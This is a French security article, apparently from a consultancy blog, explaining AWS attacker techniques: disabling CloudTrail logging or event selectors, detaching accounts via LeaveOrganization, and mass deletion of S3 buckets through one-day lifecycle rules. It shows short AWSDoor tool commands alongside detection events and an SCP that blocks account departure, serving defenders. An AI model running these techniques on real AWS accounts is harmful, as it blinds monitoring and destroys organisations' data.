<p style="text-align: justify;">L’altération des défenses désigne <strong>toute action délibérée entreprise par un attaquant pour affaiblir, désactiver ou contourner les capacités de surveillance et de détection</strong> d’un environnement cible. Dans AWS, cela implique généralement de manipuler les configurations de journalisation, de désactiver des services de sécurité ou de modifier les mécanismes d’alerte afin d’éviter la détection pendant ou après une attaque.</p>
<p style="text-align: justify;"><strong>AWS fournit plusieurs services intégrés conçus pour surveiller l’activité</strong>, appliquer la conformité et alerter en cas de comportement suspect. Ces services incluen <strong>: </strong><strong>CloudTrail pour la journalisation des appels API, CloudWatch Logs et CloudWatch Alarms pour la surveillance et l’alerte en temps réel</strong>, GuardDuty pour la détection des menaces, Security Hub pour la centralisation des constats de sécurité et Config pour le suivi de la configuration des ressources. Les <strong>environnements plus avancés peuvent également s’appuyer sur des SIEM tiers ou des plateformes CSPM</strong> intégrées à leurs comptes AWS.</p>
<p style="text-align: justify;">La désactivation ou la modification de <strong>l’un de ces services peut réduire considérablement la visibilité dont disposent les défenseurs</strong> sur les activités malveillantes, faisant de l’altération des défenses une tactique essentielle dans de nombreuses attaques menées dans le cloud.</p>
<p> </p>
<h3>CloudTrail et CloudWatch</h3>
<h4>Introduction à la journalisation AWS</h4>
<p style="text-align: justify;"><strong>Dans les environnements AWS, CloudTrail et CloudWatch sont deux services essentiels de journalisation et de surveillance qui jouent des rôles complémentaires</strong>, mais avec des finalités très différentes. CloudTrail est conçu pour enregistrer toute l’activité API qui se produit dans un compte AWS. Il consigne chaque appel effectué via la console de gestion AWS, l’AWS CLI, les SDK ou autres services AWS. Ainsi, lorsqu’une personne crée une instance EC2, modifie un groupe de sécurité ou supprime une ressource, CloudTrail capture qui a effectué l’action, quand, où et quoi. <strong>Ces journaux sont indispensables pour l’audit, les enquêtes forensiques et le suivi des modifications apportées à l’infrastructure.</strong></p>
<p style="text-align: justify;">CloudWatch, quant à lui, <strong>se concentre sur la surveillance opérationnelle</strong>. Il collecte et stocke les journaux provenant des services et applications, suit des métriques comme l’utilisation CPU ou la consommation mémoire, et prend en charge les alarmes et tableaux de bord <strong>pour une visibilité en temps réel</strong>. Lorsqu’une application écrit des journaux ou que la surveillance des performances système est nécessaire, c’est CloudWatch qui est utilisé. Il peut également être configuré pour recevoir et <strong>stocker les journaux provenant de fonctions Lambda, d’instances EC2 ou d’applications personnalisées</strong>.</p>
<p style="text-align: justify;">La journalisation réseau est également proposée par AWS via les services VPC Flow Logs ou VPC Mirroring. Bien qu’ils puissent être utilisés à des fins de sécurité, leur utilité principale est davantage orientée vers la surveillance opérationnelle. Cet article se concentrera sur le service CloudTrail.</p>
<p style="text-align: justify;">CloudTrail est activé par défaut et conserve les événements pendant 90 jours. Ce service constitue une base de journalisation qui ne peut pas être restreinte ou désactivée. Cependant, des capacités de journalisation supplémentaires peuvent être activées en définissant des trails dans CloudTrail.</p>
<p style="text-align: justify;">CloudTrail conserve les journaux et garantit leur intégrité pendant 90 jours, après quoi les journaux sont supprimés de l’Event History. Si une organisation souhaite assurer une durée de conservation plus longue ou mettre en place une surveillance en temps réel spécifique à partir de ces journaux, elle doit configurer un trail. Cette configuration duplique les journaux et les transfère vers un bucket S3, sur lequel peuvent être branchés des outils de sécurité supplémentaires.</p>
<p style="text-align: justify;">En tant qu’administrateur Cloud, il est possible de créer un « Organization Trail » qui se réplique dans tous les comptes cibles de l’organisation. Une fois mis en place, il n’est pas possible pour un compte ciblé de supprimer ou de désactiver ce trail.</p>
<p> </p>
<h4>Arrêt de la journalisation</h4>
<h5><span style="text-decoration: underline;">Attaque</span></h5>
<p style="text-align: justify;">S’il n’est <strong>pas facilement possible d’altérer les capacités de journalisation de CloudWatch</strong>, il est en revanche possible d’affecter celles de CloudTrail en désactivant simplement la fonction de journalisation.</p>
<p style="text-align: justify;">Cette fonctionnalité <strong>permet d’interrompre l’enregistrement des événements par un trail sans pour autant le supprimer :</strong></p>
<p> </p>
<figure id="attachment_27350" aria-describedby="caption-attachment-27350" style="width: 971px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27350" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_40_16-FR-Persitence-on-AWS.docx-Word-437x148.png" alt="Trail avec capacités de journalisation arrêtées" width="971" height="329" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_40_16-FR-Persitence-on-AWS.docx-Word-437x148.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_40_16-FR-Persitence-on-AWS.docx-Word-71x24.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_40_16-FR-Persitence-on-AWS.docx-Word-768x260.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_40_16-FR-Persitence-on-AWS.docx-Word.png 1349w" sizes="auto, (max-width: 971px) 100vw, 971px" /><figcaption id="caption-attachment-27350" class="wp-caption-text"><em>Trail avec capacités de journalisation arrêtées</em></figcaption></figure>
<p> </p>
<p style="text-align: justify;">Bien que cette technique soit efficace pour altérer certaines capacités spécifiques de journalisation, elle présente plusieurs inconvénients majeurs :</p>
<ul>
<li style="text-align: justify;">Effet limité : même si un trail spécifique est impacté, les Organization Trails ne peuvent pas être contournés de cette manière. De plus, l’Event History, avec sa période de rétention inaltérable de 90 jours, restera toujours disponible.</li>
<li style="text-align: justify;">Action bruyante : même si la commande d’arrêt n’est pas détectée, la plupart des solutions SIEM déclenchent des alertes lorsque le flux de journaux s’interrompt.</li>
</ul>
<p> </p>
<h5><span style="text-decoration: underline;">AWSDoor</span></h5>
<p>Cette technique est implémentée dans AWSDoor:</p>
<p> </p>
<pre>python .\main.py --m CloudTrailStop -s<br />[+] Trail logging stopped on 'management-events'</pre>
<p> </p>
<p style="text-align: justify;">La limitation réside dans le fait que cela ne désactivera que les <em>trails</em> définis dans le compte actuel et ne supprimera pas ceux définis au niveau de l’organisation.</p>
<p> </p>
<h5 style="text-align: justify;"><span style="text-decoration: underline;">Défense</span></h5>
<p style="text-align: justify;">Du côté du défenseur, cette technique peut être facilement détectée en consultant l’interface graphique. De plus, CloudTrail enregistre également l’événement StopLogging, indiquant qu’un trail a été altéré.</p>
<p> </p>
<h4>Sélecteur d’évènement</h4>
<h5><span style="text-decoration: underline;">Attack</span></h5>
<p style="text-align: justify;">Dans AWS CloudTrail, <strong>les sélecteurs d’événements permettent un contrôle précis sur les types d’événements qu’un trail enregistre</strong>. Ces sélecteurs peuvent être configurés pour consigner les événements de gestion, les événements de données, ou les deux. Les événements de gestion enregistrent les opérations qui administrent les ressources AWS, comme le lancement d’une instance EC2 ou la modification de rôles IAM. Il s’agit généralement d’appels API de haut niveau effectués via la console, le SDK ou l’AWS CLI, et ils sont essentiels pour l’audit des actions administratives.</p>
<p style="text-align: justify;">Par défaut, <strong>les trails enregistrent les événements de gestion, mais il est possible de modifier les sélecteurs d’événements pour les exclure</strong> partiellement ou totalement. Cette flexibilité peut être utile pour réduire le bruit ou les coûts dans des environnements fortement automatisés, mais elle introduit également un risque. Un attaquant disposant des autorisations adéquates pourrait manipuler les sélecteurs d’événements d’un trail afin <strong>de supprimer certains types de journaux, par exemple en désactivant l’enregistrement des événements de gestion</strong>, ce qui réduirait la visibilité sur les changements effectués pendant ou après une compromission.</p>
<p style="text-align: justify;">Ainsi, en modifiant les sélecteurs d’événements, <strong>il est possible de dégrader les capacités de journalisation de CloudTrail</strong>, rendant plus difficile pour les défenseurs la détection d’activités non autorisées ou l’investigation d’incidents.</p>
<p style="text-align: justify;">L’événement de gestion peut être simplement désactivé. Pour l’événement de données, afin d’éviter d’avoir un champ vide dans l’interface graphique, il est possible de forcer la configuration du sélecteur d’événements à n’enregistrer que des événements liés à une ressource inexistante :</p>
<p> </p>
<figure id="attachment_27358" aria-describedby="caption-attachment-27358" style="width: 1073px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27358" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_40_30-FR-Persitence-on-AWS.docx-Word-381x191.png" alt="Journalisation d’événement provenant d’une ressource inexistante " width="1073" height="538" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_40_30-FR-Persitence-on-AWS.docx-Word-381x191.png 381w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_40_30-FR-Persitence-on-AWS.docx-Word-71x36.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_40_30-FR-Persitence-on-AWS.docx-Word-768x385.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_40_30-FR-Persitence-on-AWS.docx-Word-800x400.png 800w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_40_30-FR-Persitence-on-AWS.docx-Word.png 1184w" sizes="auto, (max-width: 1073px) 100vw, 1073px" /><figcaption id="caption-attachment-27358" class="wp-caption-text"><em>Journalisation d’événement provenant d’une ressource inexistante</em></figcaption></figure>
<p> </p>
<h5><span style="text-decoration: underline;">AWSDoor</span></h5>
<p>AWSDoor peut être utilisé <strong>pour reconfigurer le sélecteur d’événements</strong> afin d’empêcher la journalisation des événements de données et de gestion :</p>
<p> </p>
<pre>python .\main.py --m CloudTrailStop<br />[+] Adding event selector on management-events<br />[+] Management events disabled on trail 'management-events'</pre>
<p> </p>
<p>Une fois le script exécuté, <strong>le sélecteur d’événements est configuré. Le trail apparaît toujours comme actif:</strong></p>
<p> </p>
<figure id="attachment_27354" aria-describedby="caption-attachment-27354" style="width: 1369px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27354" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_40_44-FR-Persitence-on-AWS.docx-Word-437x136.png" alt="Le Trail est toujours considéré comme actif" width="1369" height="426" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_40_44-FR-Persitence-on-AWS.docx-Word-437x136.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_40_44-FR-Persitence-on-AWS.docx-Word-71x22.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_40_44-FR-Persitence-on-AWS.docx-Word-768x238.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_40_44-FR-Persitence-on-AWS.docx-Word.png 1192w" sizes="auto, (max-width: 1369px) 100vw, 1369px" /><figcaption id="caption-attachment-27354" class="wp-caption-text"><em>Le Trail est toujours considéré comme actif</em></figcaption></figure>
<p> </p>
<p>Cependant, <strong>le sélecteur d’événements empêche toute journalisation</strong> ultérieure :</p>
<p> </p>
<figure id="attachment_27356" aria-describedby="caption-attachment-27356" style="width: 1205px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27356" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_41_04-FR-Persitence-on-AWS.docx-Word-1-280x191.png" alt="Sélecteur d’événements empêchant la journalisation" width="1205" height="822" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_41_04-FR-Persitence-on-AWS.docx-Word-1-280x191.png 280w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_41_04-FR-Persitence-on-AWS.docx-Word-1-57x39.png 57w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_41_04-FR-Persitence-on-AWS.docx-Word-1-768x525.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_41_04-FR-Persitence-on-AWS.docx-Word-1.png 1247w" sizes="auto, (max-width: 1205px) 100vw, 1205px" /><figcaption id="caption-attachment-27356" class="wp-caption-text"><em>Sélecteur d’événements empêchant la journalisation</em></figcaption></figure>
<p> </p>
<h5><span style="text-decoration: underline;">Défense</span></h5>
<p style="text-align: justify;">La création du sélecteur d’événements peut être détectée grâce à l’événement PutEventSelector enregistré dans CloudTrail :</p>
<p> </p>
<figure id="attachment_27360" aria-describedby="caption-attachment-27360" style="width: 693px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27360" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_41_30-FR-Persitence-on-AWS.docx-Word-159x191.png" alt="Événement enregistré par CloudTrail" width="693" height="832" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_41_30-FR-Persitence-on-AWS.docx-Word-159x191.png 159w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_41_30-FR-Persitence-on-AWS.docx-Word-33x39.png 33w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_41_30-FR-Persitence-on-AWS.docx-Word-768x922.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_41_30-FR-Persitence-on-AWS.docx-Word.png 880w" sizes="auto, (max-width: 693px) 100vw, 693px" /><figcaption id="caption-attachment-27360" class="wp-caption-text"><em>Événement enregistré par CloudTrail</em></figcaption></figure>
<p> </p>
<p style="text-align: justify;">De même, l’analyse de la collecte des journaux et de leur volumétrie constituerait un indicateur de compromission intéressant. Si le flux de journaux s’interrompt, il est probable qu’il s’agisse d’une attaque.</p>
<p> </p>
<h2>Destruction</h2>
<p style="text-align: justify;">Les attaques ciblant la destruction de données visent à <strong>provoquer d’importants dommages opérationnels en effaçant ou en corrompant de manière permanente des informations et des infrastructures critiques</strong>. Contrairement à l’exfiltration de données ou à l’élévation de privilèges, ces attaques ne cherchent pas à extraire de la valeur ou à maintenir un accès, mais plutôt à perturber la continuité des activités, nuire à la réputation ou saboter les systèmes de façon irréversible.</p>
<p style="text-align: justify;">Dans les environnements cloud comme AWS, <strong>les attaques destructrices peuvent toucher tous types de ressources</strong>, comme par exemple : les ressources de stockage, les ressources de calcul ou les composants de configuration tels que les rôles IAM et les fonctions Lambda :</p>
<ul style="text-align: justify;">
<li><strong>La suppression de buckets S3</strong> peut entraîner la perte de sauvegardes, de données clients ou d’informations réglementaires / techniques (journalisation).</li>
<li><strong>L’effacement de volumes EBS ou de snapshots RDS</strong> peut provoquer la perte totale de l’état d’une application ou de bases de données critiques.</li>
<li><strong>Le formatage du compte AWS</strong> (en supprimant tous les services possibles) peut causer une interruption de service très longue, même si les données sont sauvegardées en externe, en particulier si l’infrastructure n’est pas déployée via IaC ou si l’IaC est également détruit.</li>
</ul>
<p style="text-align: justify;"> </p>
<h3>AWS Organization Leave</h3>
<h4>Organization Leave</h4>
<p style="text-align: justify;">AWS <strong>Organizations est un service qui permet de gérer et de gouverner de manière centralisée plusieurs comptes AWS</strong> à partir d’un point unique. Au sommet de la hiérarchie se trouve le service Organization, comprenant un compte de gestion (appelé compte payeur / maître / compte de gestion) et un ou plusieurs comptes membres. Ces comptes peuvent être regroupés en unités organisationnelles, ce qui facilite l’application de politiques ou la gestion des sauvegardes à grande échelle.</p>
<p style="text-align: justify;">Chaque compte AWS <strong>au sein d’une organisation reste isolé en termes de ressources et d’identité</strong>, mais l’organisation peut appliquer des politiques telles que les Service Control Policies (SCP) à l’ensemble des comptes, imposant ainsi des restrictions spécifiques à tous les comptes, de la même manière qu’un GPO le fait dans un domaine Windows. <strong>Cette structure est particulièrement utile pour séparer les données et les charges de travail</strong> par équipe, environnement ou unité métier, tout en maintenant une gouvernance centralisée.</p>
<p style="text-align: justify;">AWS permet également d’inviter ou de rattacher un compte autonome existant à une organisation. Ce processus peut être initié depuis le compte de gestion et nécessite que le compte invité accepte la demande. De même, des comptes peuvent être détachés et déplacés vers une autre organisation, bien que cette action soit soumise à certaines restrictions. Par exemple, certains services ou fonctionnalités AWS peuvent se comporter différemment lorsqu’un compte fait partie d’une organisation, notamment en matière de facturation consolidée et d’application des politiques. Cette fonctionnalité peut être utile lors de fusions, de restructurations ou pour la gestion du cycle de vie des comptes, mais elle ouvre également un vecteur d’attaque potentiel si elle n’est pas étroitement surveillée.</p>
<p> </p>
<figure id="attachment_27362" aria-describedby="caption-attachment-27362" style="width: 935px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27362" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_41_50-FR-Persitence-on-AWS.docx-Word-330x191.png" alt="Exemple d’Organisation AWS " width="935" height="541" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_41_50-FR-Persitence-on-AWS.docx-Word-330x191.png 330w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_41_50-FR-Persitence-on-AWS.docx-Word-67x39.png 67w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_41_50-FR-Persitence-on-AWS.docx-Word-120x70.png 120w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_41_50-FR-Persitence-on-AWS.docx-Word-768x444.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_41_50-FR-Persitence-on-AWS.docx-Word.png 1223w" sizes="auto, (max-width: 935px) 100vw, 935px" /><figcaption id="caption-attachment-27362" class="wp-caption-text"><em>Exemple d’Organisation AWS</em></figcaption></figure>
<p> </p>
<h4 style="text-align: justify;">Suppression de données</h4>
<p style="text-align: justify;">La suppression de <strong>toutes les données d’un compte AWS n’est que rarement instantanée</strong>. Si certaines ressources comme les rôles IAM ou les groupes de sécurité peuvent être supprimées rapidement, d’autres, comme de grands buckets S3, des snapshots EBS ou des instances RDS, nécessitent plus de temps en raison de leur taille ou de la nature de l’infrastructure sous-jacente.</p>
<p style="text-align: justify;">Pour contourner cette limitation, un attaquant ayant compromis le compte de gestion (pour impacter l’ensemble des comptes) ou simplement un compte spécifique peut <strong>exploiter AWS Organizations en détachant le compte ciblé et en le déplaçant vers une organisation qu’il contrôle</strong>. Cette opération s’effectue via la fonctionnalité Leave Organization (Quitter l’organisation).</p>
<p style="text-align: justify;">Contrairement à la suppression de données, <strong>quitter une organisation est une action immédiate</strong>. Une fois le compte sorti de l’organisation AWS de l’entreprise, il est trop tard : l’action ne peut pas être annulée. Sans droits AdminAccess sur le compte autonome, il ne sera pas possible de le rattacher facilement à l’organisation, offrant ainsi à l’attaquant une large fenêtre pour supprimer méthodiquement toutes les ressources qui y sont attachées.</p>
<h3> </h3>
<h4>Exfiltration de données avant suppression</h4>
<p style="text-align: justify;">Bien que la commande LeaveOrganization soit une opération destructrice, elle peut également être utilisée pour exfiltrer des données avant leur suppression. Au lieu d’effacer toutes les ressources d’un compte AWS compromis, un attaquant peut choisir de détacher le compte de l’organisation, de conserver toute l’infrastructure intacte et d’exfiltrer lentement des données sensibles.</p>
<p style="text-align: justify;">Par exemple, une entreprise <strong>héberge une application eShop sur AWS</strong>. L’attaquant, ayant compromis le compte AWS, utilise l’action LeaveOrganization pour reprendre le contrôle de la ressource eShop. Cette action retire le compte du contrôle centralisé, supprimant ainsi toute Service Control Policy, toute journalisation centralisée et tout mécanisme de gouvernance précédemment appliqué par l’organisation, sans pour autant impacter sa disponibilité.</p>
<p style="text-align: justify;">Avec le <strong>contrôle total de ce compte désormais autonome, l’attaquant peut agir sans supervision</strong>. L’eShop continue de fonctionner normalement, servant les clients et traitant les commandes, mais en arrière-plan, l’attaquant dispose d’un accès illimité à toutes les ressources associées. Il peut lire les buckets S3, interroger la base de données clients, extraire des données de paiement et exfiltrer discrètement les informations bancaires ainsi que les données personnelles de chaque utilisateur, sans interrompre le service ni déclencher d’alertes opérationnelles.</p>
<p style="text-align: justify;">Du point de vue de l’entreprise, u<strong>ne fois que le compte a quitté l’AWS Organization, l’équipe de sécurité perd toute visibilité et autorité administrative sur celui-ci.</strong> Elle ne peut plus arrêter facilement les ressources impactées directement depuis son propre compte AWS.</p>
<p> </p>
<figure id="attachment_27364" aria-describedby="caption-attachment-27364" style="width: 1123px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27364" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_42_05-FR-Persitence-on-AWS.docx-Word-302x191.png" alt="Impact de la sortie d’une organisation AWS" width="1123" height="710" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_42_05-FR-Persitence-on-AWS.docx-Word-302x191.png 302w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_42_05-FR-Persitence-on-AWS.docx-Word-62x39.png 62w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_42_05-FR-Persitence-on-AWS.docx-Word-768x485.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_42_05-FR-Persitence-on-AWS.docx-Word.png 1226w" sizes="auto, (max-width: 1123px) 100vw, 1123px" /><figcaption id="caption-attachment-27364" class="wp-caption-text"><em>Impact de la sortie d’une organisation AWS</em></figcaption></figure>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;">Sans accès administrateur au compte désormais isolé, <strong>l’entreprise n’a aucun moyen de désactiver les services</strong>, de suspendre la facturation ou de mettre fin à l’infrastructure compromise. Cela donne à l’attaquant une liberté opérationnelle totale, tandis que l’organisation se retrouve aveugle et incapable de réagir autrement qu’en sollicitant l’assistance AWS.</p>
<p> </p>
<h4>Privilèges requis</h4>
<p style="text-align: justify;">Pour exécuter l’action LeaveOrganization et <strong>détacher un compte AWS de son organisation</strong>, l’attaquant <strong>doit disposer de privilèges élevés au sein du compte ciblé</strong>. Plus précisément, les conditions et autorisations IAM suivantes sont requises :</p>
<ul>
<li style="text-align: justify;"><strong>Accès au niveau du compte </strong>: l’attaquant doit avoir un accès direct au compte membre qu’il souhaite détacher. Cela signifie qu’il doit déjà être authentifié dans ce compte AWS spécifique, soit via des identifiants volés, des jetons de session, ou en exploitant des rôles ou politiques IAM vulnérables.</li>
<li style="text-align: justify;"><strong>Permission organizations:LeaveOrganization </strong>: il s’agit de l’autorisation IAM clé nécessaire pour invoquer l’appel API LeaveOrganization. Elle doit être explicitement accordée dans les permissions effectives de l’attaquant. Cette action n’est valide que lorsqu’elle est exécutée depuis le compte membre, et non depuis le compte de gestion.</li>
<li style="text-align: justify;"><strong>Accès à la facturation </strong>: bien que non strictement requis pour quitter une organisation, un attaquant ayant accès à la facturation et aux paramètres du compte (via les actions aws-portal:*, account:* ou billing:*) peut renforcer sa position, mettre à jour les informations de contact ou verrouiller les utilisateurs légitimes après le détachement. De plus, la plupart des comptes créés au sein d’une organisation le sont sans informations de paiement (car elles sont héritées du compte payeur). Cependant, pour qu’un compte puisse être détaché et devenir autonome, ces informations doivent être renseignées.</li>
</ul>
<p> </p>
<h4>Défense and détection</h4>
<h5 style="text-align: justify;"><span style="text-decoration: underline;">Prévention des appels non autorisés à leaveorganization</span></h5>
<p style="text-align: justify;">Le contrôle le plus efficace est l’utilisation des <strong>Service Control Policies (SCP).</strong> Les SCP définissent les permissions maximales disponibles pour les comptes au sein d’une AWS Organization et peuvent refuser explicitement l’action organizations:LeaveOrganization, même si un utilisateur ou un rôle IAM local dispose de cette permission.</p>
<p style="text-align: justify;">L’opération LeaveOrganization est exécutée depuis le compte membre lui-même, et non par le compte de gestion. Cela signifie qu’un attaquant n’a pas besoin de compromettre entièrement l’organisation AWS pour détacher un compte.</p>
<p style="text-align: justify;">La SCP, <strong>définie au niveau de l’organisation, peut empêcher tout utilisateur des comptes de quitter l’organisation.</strong> Dans ce cas, l’attaquant doit d’abord compromettre l’ensemble de l’organisation AWS avant de pouvoir mener l’attaque.</p>
<p>La politique suivante empêchera tout usage abusif de LeaveOrganization :</p>
<p> </p>
<pre>{<br />  "Version": "2012-10-17",<br />  "Statement": [<br />    {<br />      "Sid": "DenyLeaveOrganization",<br />      "Effect": "Deny",<br />      "Action": "organizations:LeaveOrganization",<br />      "Resource": "*"<br />    }<br />  ]<br /><br />}</pre>
<p> </p>
<p style="text-align: justify;">Cette SCP doit <strong>être attachée directement à la racine de l’AWS Organization</strong> afin de garantir qu’elle s’applique à tous les comptes membres. Elle garantit qu’aucun compte ne puisse quitter unilatéralement l’organisation, même en cas de compromission.</p>
<p> </p>
<h5 style="text-align: justify;"><span style="text-decoration: underline;">Détection et Monitoring</span></h5>
<p style="text-align: justify;">Même avec des SCP en place<strong>, la surveillance des tentatives de LeaveOrganization est essentielle pour une défense en profondeur</strong>. En effet, même si l’action LeaveOrganization échoue en raison de la SCP, disposer d’une surveillance sur l’événement LeaveOrganization peut aider à détecter qu’une attaque est en cours dans l’environnement AWS.</p>
<p style="text-align: justify;">Par exemple, une alarme CloudWatch pour déclencher des alertes lorsque l’événement LeaveOrganization ou DisablePolicyType se produit.</p>
<p style="text-align: justify;"> </p>
<h3 style="text-align: justify;">Destruction de bucket S3</h3>
<h4 style="text-align: justify;">Politique standard de suppression S3</h4>
<p style="text-align: justify;"><strong>Amazon S3 est l’un des services de stockage les plus utilisés et les plus fiables</strong> de l’écosystème AWS. Les organisations s’appuient sur lui pour stocker aussi bien des journaux et des fichiers que des données métier critiques et des sauvegardes. La destruction de données S3 peut avoir un impact bien plus important que la perte de quelques ressources de calcul, ce qui en fait une cible de grande valeur pour les attaquants.</p>
<p style="text-align: justify;">Si le téléversement et le stockage de données dans S3 sont simples, la suppression de volumes importants de données est volontairement coûteuse en ressources et chronophage. Lorsqu’un bucket S3 est supprimé ou vidé, AWS effectue une suppression récursive et séquentielle de chaque objet, ce qui peut prendre des heures, voire des jours, dans de grands environnements.</p>
<p style="text-align: justify;"><strong>De plus, AWS applique une cohérence finale (eventual consistency)</strong> sur les suppressions d’objets : même après une requête de suppression, <strong>les objets peuvent persister temporairement</strong>. Ces choix de conception offrent aux défenseurs une fenêtre temporelle cruciale pour détecter et contrer les tentatives de suppression avant qu’une perte de données irréversible ne survienne.</p>
<p style="text-align: justify;"> </p>
<h4 style="text-align: justify;">Politique de cycle de vie</h4>
<p style="text-align: justify;">Les politiques de cycle de vie Amazon S3 offrent un mécanisme automatisé pour <strong>gérer le cycle de vie du stockage</strong> des objets dans un bucket. Elles permettent de définir des règles qui transfèrent les objets vers différentes classes de stockage ou <strong>les font expirer (supprimer) après une période définie, selon des critères tels que l’âge de l’objet,</strong> un préfixe ou des balises. Cette automatisation aide les organisations à optimiser les coûts de stockage et à appliquer des politiques de conservation des données sans intervention manuelle.</p>
<p style="text-align: justify;">Cependant, <strong>les politiques de cycle de vie fonctionnent différemment des processus manuels</strong> <strong>et contournent les protections standard</strong> conçues pour ralentir les suppressions massives. Un attaquant ayant obtenu des privilèges élevés dans un compte AWS peut créer ou modifier une politique de cycle de vie afin de fixer l’expiration des objets à la durée minimale autorisée (1 jour). <strong>Une fois appliquée, cette politique est rétroactive :</strong> tous les objets existants dans le bucket seront marqués pour expiration et programmés pour suppression, et tous les nouveaux objets créés expireront peu après leur création.</p>
<p style="text-align: justify;"><strong>Contrairement aux suppressions manuelles, les expirations via une politique de cycle de vie sont gérées en interne par AWS</strong> à grande échelle et s’exécutent beaucoup plus rapidement. Cela peut permettre une suppression massive, rapide et furtive du contenu d’un bucket, sans générer le volume d’appels API ou le bruit opérationnel typique des suppressions récursives manuelles. Comme les modifications de politiques de cycle de vie peuvent ne pas déclencher d’alertes immédiates ou évidentes, un tel abus représente un risque important de destruction de données non détectée dans les environnements AWS.</p>
<p style="text-align: justify;">Étant donné que <strong>les politiques de cycle de vie sont appliquées quotidiennement, le défenseur dispose de moins d’une journée pour détecter la modification de la politique</strong>, retirer le marquage de suppression et révoquer l’accès de l’attaquant.</p>
<p> </p>
<h4>AWSDoor</h4>
<p>Cette technique est implémentée par AWSDoor:</p>
<pre>python .\main.py --m S3ShadowDelete -n s3bucketname</pre>
<p> </p>
<h4 style="text-align: justify;">Détection</h4>
<p style="text-align: justify;">La détection des suppressions furtives d’objets via les politiques de cycle de vie S3 peut facilement être manquée, car la suppression d’objets par expiration de cycle de vie ne génère pas d’événements DeleteObject standards dans CloudTrail, contrairement aux suppressions manuelles.</p>
<p style="text-align: justify;">À la place, AWS gère en interne le processus de suppression de manière asynchrone, sans attribuer ces suppressions à un utilisateur ou rôle spécifique. Par conséquent, de nombreuses solutions de surveillance de sécurité ne reconnaissent pas cette action comme malveillante, alors qu’elle vise à impacter la disponibilité des données. <strong>Le seul indicateur fiable d’une telle opération est l’événement API PutBucketLifecycleConfiguration,</strong> qui journalise la création ou la mise à jour d’une règle de cycle de vie définissant un nouveau paramètre d’expiration (Expiration).</p>
<p style="text-align: justify;">Pour détecter un abus potentiel, il convient de configurer une règle CloudWatch afin de surveiller les événements PutBucketLifecycleConfiguration et d’inspecter automatiquement la nouvelle configuration de politique. Si la politique inclut une action d’expiration fixée à la durée minimale autorisée (1 jour) ou s’applique largement à tous les objets, cela doit être considéré comme un changement à haut risque.</p>
<p style="text-align: justify;">Dans les environnements sensibles, de tels changements de configuration devraient déclencher des alertes immédiates, <strong>une remédiation automatique</strong> et nécessiter une validation manuelle. Comme cette méthode contourne la traçabilité habituelle des suppressions au niveau objet, une détection précoce au niveau de la configuration est essentielle pour éviter une perte de données silencieuse et à grande échelle : l’équipe de défense ne disposera que d’une journée pour réagir.</p>
<p> </p>
<h2>Conclusion</h2>
<h3>CSPM</h3>
<p style="text-align: justify;">L’article a montré comment les configurations IAM peuvent être exploitées de manière furtive pour maintenir un accès à long terme dans des environnements AWS. Des techniques telles que l’injection de clés d’accès (AccessKey injection), l’ajout de portes dérobées dans les politiques de confiance (trust policy backdooring) et l’utilisation de politiques NotAction permettent aux attaquants de persister sans déployer de logiciel malveillant ni déclencher d’alertes.</p>
